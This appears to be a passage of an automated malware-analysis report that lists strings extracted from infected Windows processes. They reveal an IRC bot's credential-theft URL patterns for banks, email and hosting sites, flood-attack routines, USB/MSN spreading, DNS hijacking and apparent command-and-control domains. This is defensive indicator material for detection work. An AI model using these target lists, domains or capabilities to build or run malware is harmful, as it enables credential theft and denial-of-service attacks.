re><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>\??\%System%\csrss.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Upwiwc.exe</pre><pre>7 767<7><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\system32\csrss.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe</pre><b>winlogon.exe_716_rwx_012D0000_0004E000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0.</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>\??\%System%\winlogon.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Upwiwc.exe</pre><pre>7 767<7><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\system32\winlogon.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe</pre><b>services.exe_760_rwx_00B70000_0004E000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d 